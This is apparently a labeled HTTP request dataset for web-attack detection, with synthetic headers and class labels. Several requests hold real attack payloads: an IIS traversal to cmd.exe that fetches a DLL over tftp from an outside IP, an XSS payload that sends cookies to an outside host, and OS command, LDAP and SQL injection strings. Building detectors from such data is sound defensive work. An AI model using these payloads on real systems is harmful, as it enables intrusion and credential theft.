Transfer-Encoding: h8AhWh; stiarEnc=qcAta
Upgrade: uwafEE/9.8, tafaoe/7.4, oae/4.1
Warning: 777 www.ddJnowin.js:90 "ihAsi7h3etftaeabder" 
X-Forwarded-For: 50.243.79.16
X-Serial-Number: 829949224403613384
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31828
Start - Id: 3403
class: Valid
GET /ezqkaio/g9nous3nTw5e/aahpaAtldthar2f6ge2.nsf?aeTL=rcpQenlrk7d&iuKnHsrd=yoet&6uyt4nr=7eiitieee3S HTTP/1.0
Host: 180.161.130.189
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: min-fresh=7
Client-ip: 199.209.79.52
Cookie: tq8lstheeere=abgsoundhl)iGtai+ong)
Cookie2: $Version="1"
Date: Mon, 14 Apr 08 09:31:46 UTC
ETag: "JdtzTdcYaduceF.Y5"
Expect: orestO=oite
From: tcne@mneudneS.biz
If-Modified-Since: Thu, 02 Sep 04 01:29:02 GMT
If-Unmodified-Since: Tue, 15 Dec 09 01:46:32 GMT
If-Match: "bWOhKAuevkXZbLT"
If-None-Match: "uCHCO@MS9szYcjt."
If-Range: *
Max-Forwards: 2
MIME-Version: 9.2
Pragma: 6foi5='e2tfr'
Proxy-Authorization: Basic am1YaThzdHQ6MWFtYWEyOA==
Authorization: NTLM bnlvbWR0b0RpbTFubXE5bGthbGZpdDNieGNkc3dmaTRmNw==
Range: 03774-3
Referer: http://www.nmrcSBu.it/seanE/7Cre.wav
TE: deflate,deflate;q=0.7,deflate
Trailer: Upgrade
User-Agent: Mozilla/0.6 (compatible; Konqueror/7.5; WinNT; roQ7e)
UA-CPU: MIPS
UA-Disp: 3995,5069,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 969x7653
Via: 7.2 www.svari.htm, 6.8 www.rgor.shtml, rtiee/9.7 www.2Esd.jpg
Transfer-Encoding: compress
Upgrade: rdse/9.1, lomd/5.7
Warning: 453 www.eoeedi.html "tsOph99ru" "Sun, 31 May 09 02:52:33 UTC"
X-Forwarded-For: 185.226.136.192
X-Serial-Number: 08906693343681546390
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3403
Start - Id: 26173
class: Valid
GET /illyqealqprslle/tIM6kPkrwBEV/oexoclsfrseerhsem/thrmiEE/5eYLALlyhL/yLO97wJ_@kNltNeCqdJb/3p5/yohvPDHPe_zlq6/iGO3HpX6CcaV5OMLmkx/yv.png?ocv.tFtLaccept=91b&rszn9=19346&mnspRersthmC=3684173&rSJwhereiRmetainsertF=sbgsoundddE&h3tia2l5tlttsr=hialBDyp&wmn=cJHZ&smoiH=845&U2rmnnuoHNtdra=884271&deey=e%3D4f&Mixrgas=2672434045&sbsrdj6bhecs=64&4fikrpC=82&emsdlwe9=selectte0&lqednuens=95&rESmoi=-exrsos+eeimgseja HTTP/1.0
Host: www.hyWeaLenm.cz
Connection: vhuqMxst
Accept: text/plain;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.3, gzip;q=0.0, identity
Accept-Language: eo4-1erv;q=0.3, r-heniand;q=0.3, 5nbc07on-5rbfhd2;q=0.2, lPa-4Xxplna, qiLm-NhSgv;q=0.9
Cache-Control: no-transform
Client-ip: 2.25.83.104
Cookie: etnevk=1 >
Cookie2: $Version="623"
Date: Wed, 03 Aug 05 10:48:20 UTC
ETag: W/"vRVeaFMIYVb9D74N"
Expect: 100-continue
From: k64yl@itTpiyl.org
If-Modified-Since: Sun, 04 Sep 05 16:08:02 GMT
If-Unmodified-Since: Thu, 20 Dec 07 09:09:28 UTC
If-Match: "BvDzRMc3@QmCjRIUn"
If-None-Match: "AIWa6ONTWH_rpfeo"
If-Range: *
Max-Forwards: 35
MIME-Version: 1.3
Pragma: m=izn
Proxy-Authorization: Basic ZWljdW06aDdkSW8=
Authorization: xbsh ePotte=tyesahiq
Range: -67,99705-9390
Referer: /ealre/mrox/aTrtj2u/1rn1aus.swf
TE: trailers,gzip;q=0.8
Trailer: Upgrade
User-Agent: Mozilla/4.1 (X11; U; SunOS sun4u 6.9; Rc-eh; rv:2.4.6) Gecko/36727003
UA-CPU: x86
UA-Disp: 048,473,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7580x3767
Via: FTP/1.0 68.71.149.87:70768
Transfer-Encoding: deflate
Upgrade: sbthb/1.3, ctm/5.8, jMsOp/9.9, 0wrop/6.2, 2uaa1/2.7
Warning: 091 41.251.186.23 "rRst8cre" "Sat, 21 Feb 04 24:26:15 GMT"
X-Forwarded-For: 102.26.95.103
X-Serial-Number: 77624336
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 26173
Start - Id: 36758
class: OsCommanding
GET /abO7TWsii_l8X1NzpVf/hmlrQ@P52foD4uKsTn2/sceaotIt/bQ__/eL4tbe/kOP8AwtOnGlsvvGyf2xs/ep/hwre.asp?eez=+sitere&kh89uece8efe=ddocA9anqdsirn&k599ldxmn=tooalveoon&allPZsaoCmeta=dmkUrr1J%40o&IozEpyhRt=rescodropm&saqShmhoetMne=%27++++%3Bps+++-aux+%3B&2d3nb8tnhex7n=ae%26e%28ia HTTP/1.1
Host: 3.238.135.218
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=9206
Client-ip: 130.81.190.203
Cookie: QPCSXmb25=t=aW;dtmoe=37CqSshutdownoyxo4m;qn=113926033
Cookie2: $Version="576"
Date: Sat, 07 Jan 06 12:47:17 UTC
ETag: W/"nq-5AohjOXHMiQfI"
Expect: 100-continue
From: 1Ruwies@Rllsdtnt.st
If-Modified-Since: Tue, 04 Nov 08 19:30:21 CET
If-Unmodified-Since: Sat, 28 Mar 09 10:17:41 CET
If-Match: "AcodqUqxsT1b9Y33"
If-None-Match: "HfjEhsKvvX7hEI24"
If-Range: "XISmt7q2iLSY2FHm"
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest response="49a2dbb09A077a8FDd2baA76dAA5E5dd"
Authorization: NTLM Z09pYm5pYmV0bHdlc2xreWlwZnJlbnJobmVFc2R5czZ0ZmFvMGV0cGtneA==
Range: 8-,6-50
Referer: /e0earIem/9jiji/junteax/5tle.doc
TE: deflate,trailers,gzip;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/9.7 (X11; U; Open BSD i386 2.6; id-vl; rv:5.1.1) Gecko/70454158
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 232x1783
Via: 6.1 215.249.75.54
Transfer-Encoding: gzip
Upgrade: ozdet9/9.7, Rir/6.3, t2nuis/3.2, OrehaH/2.4
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36758
Start - Id: 38589
class: LdapInjection
GET /egDKWi5LHbFJy/ifS_5jF/eVCwT/l@n99yHmLGwt_4ft2/auSCcneipeostceist/8dmVq1jnn6lxZtYLEH/afezdutenyei8aIaioat/netmwtCOosdnj8cNatdc.php3?a8tweshhxnbekhk=Nv7fheG&ywKyeFk-LKlx=%29++%28++%7C++++%28anAtr%3DNd*%29&U3iNDeval.QEftpS1=7j8eot7Kserzsbn&avltg1ddg9=4098509996&idno1rk6Otmr=lsort&wyrcg5rrv2s3en8=7361104&lbteatnalfSonb=ao3AYtwdtdwo8e&RGwindow.openpAIA=Tmn&rl4ue6Jia=smwget+i&oo=okssimohc4nwoLpdl&NM2rePT=rgmrt%295hat%7C&Aieae0seiovLam=uo8cOheieieedso&iooernuiyirir75=tm&mjnuEselsa=domh93jRogPX&8leHihiRpkdselr=r+e%7Em%29+r HTTP/1.0
Host: www.ptof.be
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ur-oitk, pltNaeo-y
Cache-Control: max-age=50798
Client-ip: 41.219.136.17
Cookie: ny0uloro=eaetisndto2rtenn;oa6Ie1=2iB8_S;emya=1651213
Cookie2: $Version="7"
Date: Wed, 21 May 08 16:42:06 UTC
ETag: "-JtG7_R7TXsAf9DYaiP"
Expect: 100-continue
From: erpfbp@n3i1grbt.st
If-Modified-Since: Thu, 29 Jan 04 05:22:33 CET
If-Unmodified-Since: Thu, 15 Jan 04 11:46:10 GMT
If-Match: *
If-None-Match: *
If-Range: "sxv3v.j2cwm90IEEQv"
Max-Forwards: 082
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: Digest opaque="rseh"
Range: -348176
Referer: /sroCldr.png
TE: trailers,trailers,deflate
Trailer: If-Range
User-Agent: eoWMjex http://www.e5vm0.de
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7804x6342
Via: FTP/2.3 209.176.240.142
Transfer-Encoding: compress
Upgrade: teh/3.7, eErn/1.4, yrgp42/8.0, 3Ets/1.6
Warning: 494 www.yte1Tn.shtml "iewe" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 379109696738614
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38589
Start - Id: 34461
class: Valid
POST /ntnhmeoecqOwhrheuyKb/aTK_HlTH/eolsbpehn/eDVLTYGWGEhcatu./hanc2RboooI4n.sh? HTTP/1.0
Content-Length: 224
Content-Language: xio,iiuyi
Content-Encoding: identity
Content-Location: /st1s.php3
Content-MD5: aG90b3BoYjhMZXNpZW81ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Nov 07 04:53:04 CET
Last-Modified: Mon, 15 Oct 07 21:38:04 UTC
Host: www.oixwihp.com:80
Connection: keep-alive
Accept: video/*;q=0.0, audio/basic, video/quicktime;q=0.5
Accept-Charset: x-mac-ce;q=0.2, windows-1254, windows-1250;q=0.6, us-ascii;q=0.6
Accept-Encoding: gzip;q=0.4, gzip;q=0.7, identity;q=0.1
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 123.214.67.119
Cookie: tNhc=l3gq3i
Cookie2: $Version="139"
Date: Wed, 23 Mar 05 21:20:46 CET
ETag: "RviFC6iGwFzVnCC"
Expect: xHOr13i=ezEi;1nOt4U7r
From: 7mfJfrJ@Etuoenx85.it
If-Modified-Since: Tue, 30 Oct 07 22:32:06 GMT
If-Unmodified-Since: Wed, 29 Sep 04 12:58:21 CET
If-Match: "F79GouyNpIAnWJO9e9"
If-None-Match: "y0WdjgjMU3hpAEWCJMe"
If-Range: "n2RUGyQ-dJAb1yqQ"
Max-Forwards: 112
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic Y3k0YWRhaGU6M2tlZQ==
Authorization: Digest qop=auth
Range: 72-2529,-2,002-88966
Referer: /Iuwth/rvoddeu/l8oe6t.asmx
TE: trailers
Trailer: If-None-Match
User-Agent: hrsB (oPy6eJV; oHZZhINQH)
UA-CPU: StrongARM
UA-Disp: 7789,084,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3150x9630
Via: nesi/5.2 www.nflpri.tiff, 8.9 70.124.32.151, 7.5 115.54.99.12
Transfer-Encoding: identity
Upgrade: wgtupi/0.4
Warning: 583 www.eatteot.gif "mglnleiqoRbnha" "Sat, 21 Mar 09 19:35:43 GMT"
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 2852435165133
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

fSai=ajn&ahhieegan=qApassthruooo-htihR&40gusrieitr=kaTrmtsi&tu=3653&YDEq=20&ajno=612039484&SLeoEhtaqo=52529011&tgie=~&loutg=dasirrEnrN&gti2rn=n@aEAAsB&m9icx2=tmpuirh niswreiDnix&esheO=913964754&gufoo=04773&aYssjmus=91487

End - Id: 34461
Start - Id: 27213
class: Valid
GET /nIoyy@WebSy41/xlfrssfid7rh6mshoay3/r.G-TqHefd@IcGCBHnl/ivToenVxe6ae8ln/hlza39hijins/62Qp3P23.sh?5Stnf=3iNrimgsnoicunionw4ls&e9eTtumemsydja=497&o8nimzsrPade=8822&anuihg7egyvar=i7FHX-QHOm&H3momitdaEinaro=9324966&l2teK=Mtootn&1eeive9rdx7a=44&uta6a=sfenaAscn4tztdlLs&yftxu=ydnosMR&sbAlibbetween6allFhLK=shtacces%3Bmailr&q8JgK5m@DP6=i%28admin+d&nhta=wchildpatBe&5zwcDane5q=ztpruIn9tto&ektl=hE7 HTTP/1.0
Host: 158.255.25.174
Connection: close
Accept: application/*
Accept-Charset: x-mac-hebrew;q=0.5, iso-2022-kr, windows-1252, iso-8859-9;q=0.7, windows-1254;q=0.3
Accept-Encoding: 
Accept-Language: ciqudtd-2w3it78;q=0.0, eiuet-g6e
Cache-Control: min-fresh=212
Client-ip: 243.192.18.149
Cookie: aueoM=child%s;zs6r=r9etermstyldoe;tx58tcqpha=sxe
Cookie2: $Version="883"
Date: Wed, 15 Nov 06 20:15:03 UTC
ETag: W/"uuyM-6FilYWqa@Bq"
Expect: sUpI=shahsoEh;teth0f1o=nebdm4
From: nseo2sh@tNat6ef8to.be
If-Modified-Since: Thu, 15 Mar 07 05:57:48 GMT
If-Unmodified-Since: Sun, 09 May 04 05:36:58 CET
If-Match: *
If-None-Match: "iM5Szvsl4yX3ZY0P5dg3"
If-Range: Fri, 15 May 09 12:32:16 UTC
Max-Forwards: 565
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM bnRzbjVsZWhzbmVzcG1mZjZ0RWR0c2FlcXJyZVVzNXJlZWV2YWR1MXdv
Authorization: sIaieC zon1iAtz=slii6a4
Range: -69817,-9
Referer: http://www.Tilo.gov/sa1dt/rArq/t6cotbd/oePsl.sh
TE: deflate
Trailer: If-Match
User-Agent: Fmzyt3sEh (t7qSNz-Xxm; by-3jku; 97uSfJ)
UA-CPU: 68000
UA-Disp: 451,9242,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0571x6226
Via: FTP/9.1 177.144.162.95:05, 9.0 224.150.216.142:840, doOti/7.4 www.rshti2.html
Transfer-Encoding: deflate
Upgrade: etani/8.7, cfAetN/7.0
Warning: 126 www.tttHrTrO.gif "d5Snbahld" 
X-Forwarded-For: 14.247.1.159
X-Serial-Number: 74622774860135514346
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27213
Start - Id: 1430
class: Valid
GET /ine7atg9Sak/oqY5_nA7/Yxp_LlZDo/a8WPVRoj.BG6o8SeQGfa/9.winnthK-.bin?lmridcmSnTn=wZopSG4IZZg&brutwrOnzot=ahomsrysey7cciu&miaro5eelm=217614&rdcfaleSrnez=z%28ren+ns%28entn&buwh=nIgaoxp_ospassthruc&eianc6ebols=65347 HTTP/1.0
Host: www.vroxhn.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.1
Accept-Language: *
Cache-Control: max-age=4689
Client-ip: 151.208.70.36
Cookie: eoamkhn4s9Ciatb=enUi2cA0hcux;nEN=269106595;mint=epm6VshH6nn;oeorsw=ewrb9
Cookie2: $Version="5"
Date: Mon, 05 Jun 06 02:14:33 UTC
ETag: "VZWpwdhLnZHVFq@U4"
Expect: eekslmst=tei8
From: etps@nerI.uk
If-Modified-Since: Sat, 11 Feb 06 21:38:30 UTC
If-Unmodified-Since: Thu, 26 Oct 06 17:01:40 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Feb 04 03:01:17 CET
Max-Forwards: 829
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic aXNlZWFGOmFnc3M=
Authorization: NTLM dXJzMWhodG9hYzJwb2J0RWVhV3JhRWVydGxoZWxSdGFJcGF0bHk5bzhlYWVpbmV0
Range: 6-15763,0058-47
Referer: /eldwsrT/reiqeiiy.shtml
TE: chunked;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.7 (Windows; U; Windows NT 5.0; t3-ER; rv:7.2.2) Gecko/76226656
UA-CPU: x86
UA-Disp: 592,845,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 226x4570
Via: 0.7 248.135.40.233, 3.6 www.du7t.jpeg:1691, FTP/0.4 www.iott.html:035
Transfer-Encoding: identity
Upgrade: Naoru/5.9, Rztagf/1.1, grf/0.6, usr/4.8, l9i/8.2
Warning: 674 176.177.145.209 "w8sNts" 
X-Forwarded-For: 112.212.64.188
X-Serial-Number: 1347008
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1430
Start - Id: 29871
class: Valid
GET /feEnduwdtllai2z2gp3/eedid4anntdoopi5emR/r6ePienyrrceed/iOoirhg5nhpT5ms.htm?e9letht9=alt&shutdownSkbG@85=eiaoEd6is2H7ehO&tylhnsaOebho=ojgbStN6r&tbw=%2BAn1%26&Gsohn=e2r&65ehezsesf=Tqu%7E%3ESaccept%3F%29i9eotelneta HTTP/1.1
Host: 5.233.89.9:25
Connection: keep-alive
Accept: video/quicktime;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.6
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 192.8.187.37
Cookie: axstnn=ofIeGLX6Nj7Z;il6pml0q=ceuvgBgsatc;d0rk9irqbe=67488377;hnt=053;E2ga4uat6t=r43positionra49mpon;g3Wh=dbrWK2-YRb
Cookie2: $Version="1"
Date: Sun, 22 Jun 08 16:08:48 GMT
ETag: W/"_IjatwEpMy_E.-i5EQ_n"
Expect: ermu
From: hggtsom6@ieylr.uk
If-Modified-Since: Wed, 15 Feb 06 24:31:19 CET
If-Unmodified-Since: Thu, 25 Mar 10 10:54:50 UTC
If-Match: *
If-None-Match: "GjkUPWhH.jAqOGL"
If-Range: Fri, 24 Mar 06 03:10:18 GMT
Max-Forwards: 58
MIME-Version: 7.6
Pragma: r4=xors
Proxy-Authorization: Digest response="45DcFe932F9403C0A2bd6e0bCfDd5a07"
Authorization: Basic YW5zdnV0YTpjb1JhOXE=
Range: 955167-75,390-,1-
Referer: http://www.mnhsnz5a.uk/mt8m/4leo.exe
TE: gzip
Trailer: Via
User-Agent: Mozilla/1.3 (Machintosh; U; PPC Mac OS X 8.6; si-ad; rv:8.5.5) Gecko/83531384
UA-CPU: StrongARM
UA-Disp: 724,467,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 952x914
Via: 2.9 19.111.183.191
Transfer-Encoding: AEiwen
Upgrade: an1xa/7.5, saltfi/7.3, Yri8/0.3, y6siea/3.9, snse/6.7
Warning: 570 101.76.63.64 "qhHehxa5pope" 
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 82258082988548
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 29871
Start - Id: 23156
class: Valid
GET /hikcd/Tumhtditel5htm5rd.cgi? HTTP/1.1
Host: www.9gbtIvp.fr
Connection: 3e0l3e
Accept: video/*;q=0.3
Accept-Charset: windows-1258;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 55.96.95.22
Cookie: lvuiamaa2fdo=1uupdateidphp;tci=3394195687;aWhq=mocha>
Cookie2: $Version="573"
Date: Tue, 03 Jun 08 22:58:48 GMT
ETag: W/"DoQ3O1.-wYoAiKs"
Expect: srvh=dslq;Lte6owo
From: aadN@latousamhh.uk
If-Modified-Since: Tue, 11 Jan 05 11:53:21 CET
If-Unmodified-Since: Fri, 24 Sep 04 07:51:39 GMT
If-Match: "iRPRdeK2bQp.uB0upk9"
If-None-Match: "rIKFrQwl4buHLTco"
If-Range: "zHGLPs.ydmSh5d4W"
Max-Forwards: 892
MIME-Version: 4.6
Pragma: Ehnnf='seds'
Proxy-Authorization: ariihf uAaec=elRxHnr
Authorization: E8Cnkm 0ahswe=rioe2w
Range: -362684,26-
Referer: http://www.jlo7rru.ch/irrhnd.zip
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: oshghhefli4eW56e1
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 293x103
Via: 4.1 198.213.182.134, FTP/9.8 33.241.8.88
Transfer-Encoding: gzip
Upgrade: aeo6t/4.4, matg/8.3, 0dn/5.9, uoO/0.4
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 179.20.58.194
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23156
Start - Id: 43667
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.1
Host: www.rm7eaurtIt.be
Connection: close
Accept: */*
Accept-Charset: euc-jp;q=0.2, x-mac-chinesetrad, x-mac-turkish;q=0.8, windows-1250
Accept-Encoding: 
Accept-Language: aGscn-5oz;q=0.7, Eieot-s;q=0.9, u-0eFl;q=0.7
Cache-Control: max-age=67513
Cookie: iwlMxrebad=67297664;9aimvp=9q_CAtew;JKux=93712;RKZQ=hotE2enqS8
Date: Sat, 18 Sep 04 13:50:29 UTC
ETag: "y-vPzRAwL-5olCNDYBs"
Expect: 100-continue
From: Wehzk@ajSrRs.cz
If-Modified-Since: Tue, 06 Dec 05 09:36:51 UTC
If-Unmodified-Since: Sun, 09 Dec 07 13:12:33 GMT
If-Match: "4RwpNY5ja7vm3k-"
If-None-Match: *
If-Range: Sun, 31 Jul 05 13:20:23 GMT
Max-Forwards: 7
MIME-Version: 2.2
Pragma: no-cache
Referer: /dsiht/npocmyo/brsfT/losn5s/cnrajor8.mdb
TE: chunked,gzip;q=0.9
User-Agent: Mozilla/7.6 (compatible; 6eonim; Win98; Iode5; auapegao; TceNe)
UA-CPU: Sparc
UA-Pixels: 697x5821
Via: 5.6 40.21.55.90:554
Transfer-Encoding: compress
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 309 41.169.220.190 "skootttttuEirTl" 
X-Forwarded-For: 129.156.147.149
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43667
Start - Id: 46956
class: XSS
POST /nndarotCJieoerstuh/fB3RcJbpvML/6Cwhtacces/K0a5Sshutdown/8YCmgmaWk6SAdCa3/tv/ifa/dde7scdhbym/ezu5/thpb1heenC1c/e@/tepOKvjKRhbu2.pl? HTTP/1.0
Content-Length: 217
Content-Language: yxl,asTe,at5Eddre
Content-Encoding: compress
Content-Location: http://CpfEj.net/h7qul/eiAbeia.exe
Content-MD5: SWluOG9xb2VqOGphN3VnaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Apr 05 08:29:42 GMT
Last-Modified: Sat, 09 May 09 01:41:35 UTC
Host: www.nnhpntauTh.ch:168
Connection: lIwee
Accept: video/*;q=0.8, image/*;q=0.6, application/*
Accept-Charset: iso-2022-jp, iso-8859-8, x-mac-korean, ks_c_5601-1987, windows-1257
Accept-Encoding: 
Accept-Language: s-asWTzajo;q=0.2
Cache-Control: max-stale
Client-ip: 15.111.69.143
Cookie: drVFelniocUdi=A drfe;1ytspu2=fselectis'r=q2te0d;fdtni4khi=je09lr;isClisslKenratq=2026474687;nrta=wUE;5ZXCCtONUv4P=451
Cookie2: $Version="609"
Date: Wed, 30 Mar 05 10:44:28 CET
ETag: "NViduy7oqvlSc-i"
Expect: evean=mohg7n;noLnieD
From: trhir@9toer.gov
If-Modified-Since: Sun, 04 Apr 10 14:21:16 GMT
If-Unmodified-Since: Fri, 17 Dec 04 07:22:30 CET
If-Match: "aY1zQkWvfk1iImzCN"
If-None-Match: "qFf5dIeaBIgWIn.J"
If-Range: Mon, 08 Mar 10 13:20:16 UTC
Max-Forwards: 6
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic b2hpb246UnlyOU9xZA==
Authorization: rerszw usenni=aemerlNI
Range: 7-,-974,384-64
Referer: /dgu3rA/fiae.txt
TE: deflate
User-Agent: Iorge/4.2.2.8
UA-CPU: StrongARM
UA-Disp: 698,9133,32
UA-Color: color16
Via: HTTP/9.5 94.53.182.200
Transfer-Encoding: gzip
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

usEtNoBmre=<div   style  ="     background-image:   url(javascript:  [document.location.replace   ('http://www.le.com/cgi-bin/arranetrar.cgi'+document.cookie);]);     "  >

End - Id: 46956
Start - Id: 22265
class: Valid
GET /aGDB/2memNonmaBbsg/gymatrdofingH1Ee/eacAzaxrijgOh3sd/raaeasCninuEEbr8r/7Gzhvqg6autoexecui7MrQ/mXDq_2XZ_Ps7RX8.php3?hrwhzyeihbjrg=iGCL20LVmqF&o4i=6672232&emu0eeTiddn=tthscript%3EHcmdt&dLgtem=a%3A2js&h4OBy=%2Boptwoie%5Da&9yI7ph3Kh=+fonNee&coet=123&GzbBW.V4=icMFO6kz0Zc&-RWE=h&efnejracro=tsT1Ahax&gfeYtoessdeimrr=qROFoY3rX&xROdyq-p.Kvk=3197&xT3.f1xp_=ranaecw&tZttCPTF5autoexec=Rt0%7Cto%2Bh+&s6iqitNnbhlwv4=ohanq+iiwboot.inierru+ HTTP/1.0
Host: 80.94.184.174
Connection: lheqhie
Accept: image/jpeg, video/quicktime
Accept-Charset: *
Accept-Encoding: compress, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 62.159.240.239
Cookie: rI5aiuwtnA1tdtr=semod;cw=658898382;npelbleeo=12;ynrcus=4;wh5eed=Tud;3vjaGcYp6L=39161
Cookie2: $Version="756"
Date: Sun, 16 Mar 08 07:09:00 GMT
ETag: "t6MjT1G01PaQYi9"
Expect: oz0Ted=ierRlone
From: orEtts@ismhaeter.de
If-Modified-Since: Sat, 05 Jul 08 03:31:23 GMT
If-Unmodified-Since: Wed, 25 Feb 09 13:43:40 CET
If-Match: *
If-None-Match: "wEZdj8rB7OKRI.hxs4s"
If-Range: "ClD_8_oNM04p@1STZaId"
Max-Forwards: 75
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://Fgi8he.org/solt1orn/naghniat/r1tfe/sEaetih.jpeg
Range: 187831-,-728581,-573791
Referer: http://trrnh.st/tseese/cdnhgqc/uen66/5etsve/teeMt.gif
TE: trailers
Trailer: From
User-Agent: rCvUUBMCaC http://www.g7iphi.ch
UA-CPU: MIPS
UA-Disp: 0876,9361,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 196x167
Via: FTP/6.1 www.nu4eusae.gif, 8.5 192.102.42.50, FTP/6.0 www.tulhn.html:861
Transfer-Encoding: rt4O; teitRog=stgeafha
Upgrade: oc4wp/6.9, t1tro/5.4, onou/8.2, neir/9.3
Warning: 967 240.225.47.66:3503 "oene7icne5sdt6" 
X-Forwarded-For: 87.182.52.50
X-Serial-Number: 35178476793
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22265
Start - Id: 41276
class: SqlInjection
GET /lxbSEF/l5dtaa/ejU.p0R0HL/6BEsjcs@a_/ecanwe/l-WMj@2lautoexec@/hf4lcss.jsp?an=2453&edowwrwgsq=moeiowTdc&daawayr=%3Ae%2Buid4sph&astuzweaind=38942290&wtejs0Tf=l6m+sgroup+by%3Es3an&t6trn7rct=85857227&lDLEO=yc3pTmhsj&ec3s0dhoL=P6lhoct%294kebcr1&onean44oezh=570&5dftaf=%3Arh&nhMC3tasu2saea=oEMIYYC83O HTTP/1.0
Host: www.Oirn7m.net
Connection: keep-alive
Accept: text/plain, audio/basic;q=0.1, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: naLa-f, Fmonu5-onwo0d, r5f6e-hrxk;q=0.4, a0db-jeeEy3
Cache-Control: 9ajer4='ibCtone'
Client-ip: 214.176.219.241
Cookie: 4borcsgnrt6bga=group bya0d;gohdimyc45rA=execboirbodya esee ;Cfshu0m0kRa2=tAexecru;tbutiileat2s=;homeqbiGstsu)aalid[gea;9mP4hqbin1=6bsspuu;eyetlvauzeh=' group by  users.id     having   38=38
Cookie2: $Version="01"
Date: Thu, 06 Apr 06 24:55:11 UTC
ETag: "RwUFwv_47PNnyMM"
Expect: 100-continue
From: rahrbmga@xtei.com
If-Modified-Since: Thu, 27 Jul 06 14:55:01 UTC
If-Unmodified-Since: Tue, 25 Sep 07 02:59:08 CET
If-Match: "rIBS309AEsR9h5ih56"
If-None-Match: *
If-Range: "69nj8ZWpq.n-qS04XkxY"
Max-Forwards: 1
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: deoa hlT7nho7=cepy
Authorization: NTLM bmllN2R3cnh3YWFBeGtkdGJpemdIMG1zc29zTGVydHNJa0lyZ2VzNmVjaTNPZG91
Range: 27-,168658-8445,77-
Referer: /pueeo/ld5l.conf
TE: deflate,trailers
Trailer: Referer
User-Agent: jcakEg-Tc http://www.gdl8sEq.be
UA-CPU: StrongARM
UA-Disp: 1519,2256,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 952x1778
